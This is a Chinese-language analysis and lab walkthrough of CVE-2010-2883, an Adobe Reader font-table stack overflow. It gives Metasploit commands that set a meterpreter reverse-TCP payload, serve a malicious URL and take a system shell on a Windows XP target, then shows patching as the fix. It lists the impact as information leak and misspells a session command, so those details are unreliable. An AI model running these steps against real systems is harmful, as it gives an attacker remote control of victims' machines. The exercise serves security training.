CVE-2010-2883漏洞分析
一、漏洞信息
1. 漏洞简述
漏洞名称:Adobe Reader TTF字体SING表栈溢出漏洞
漏洞编号:CVE-2010-2883
漏洞类型:栈溢出
漏洞影响:信息泄露
CVSS评分:9.3(High)
利用难度:Medium
基础权限:不需要
2. 组件概述
Adobe Reader是美国Adobe公司开发的非常流行的PDF文件阅读器。pdf中带有TTF字体Smart INdependent Glyphlets (SING)表的UniqueName成员在CoolType.dll中执行一次strcat函数。
3. 漏洞利用
Adobe Reader 9.3.4之前的版本的CoolType.dll中存在基于栈的缓冲区溢出漏洞函数strcat,在执行时会将pdf文件的SING表的UniqueName字符串拷贝进栈中,并且不检查字符串长度。4. 漏洞影响
Windows、Macintosh和UNIX系统下Adobe Reader 9.3.4 之前的版本
综合渗透测试-CVE-2010-2883-PDF漏洞提权
第一步,打开网络拓扑,启动实验虚拟机,分别查看虚拟机IP地址:
Kali Linux
Windows XP
第二步,打开Kali Linux渗透机使用命令msfconsole进入Metasploit渗透测试平台,使用模块adobe_cooltype_sing生成木马文件。
输入search adobe_cooltype_sing命令搜索Adobe渗透模块
与漏洞相关的模块有两个,编号为0的模块是使用本地的服务器挂载木马文件的模块,编号为1的模块是生成木马文件需要用到的模块。
使用use exploit/windows/browser/adobe_cooltype_sing命令调用渗透模块,并查看模块的详情
使用set SRVHOST 172.16.1.100命令,设置渗透机监听的Apache服务地址
使用set payload windows/meterpreter/reverse_tcp命令设置meterpreter载荷
使用set LHOST 172.16.1.100命令设置Kali用于监听本地地址
使用set LPORT 命令设置本地用于监听的端口
使用命令show options查看配置完成的参数
最后使用命令exploit执行模块
得到一个http://172.16.1.100:8080/RlMOOPnOuIvk的URL地址
第三步,打开靶机Windows XP的IE浏览器,使用浏览器访问上面生成的URL
第四步,切换至渗透机中查看效果
此时已获得系统最高权限,使用命令session -i查看当前后台活跃的会话。
使用命令session -i 1切换到编号为1的会话中,并使用命令shell进入靶机命令终端
第五步,回到靶机Windows XP安装最新版的Adobe Reader阅读软件。首先在安装新版本的Adobe Reader软件之前卸载旧版本的软件
选择Remove,然后点Next,接下来直接选Next继续,将Adobe Reader卸载掉
然后安装新的版本,安装文件(Adobe_Reader_11.exe)位于桌面
勾选上自动安装更新(推荐)(A),然后点安装
安装成功后再次访问URL链接
回到渗透机中查看效果
发现木马已经失效,加固成功。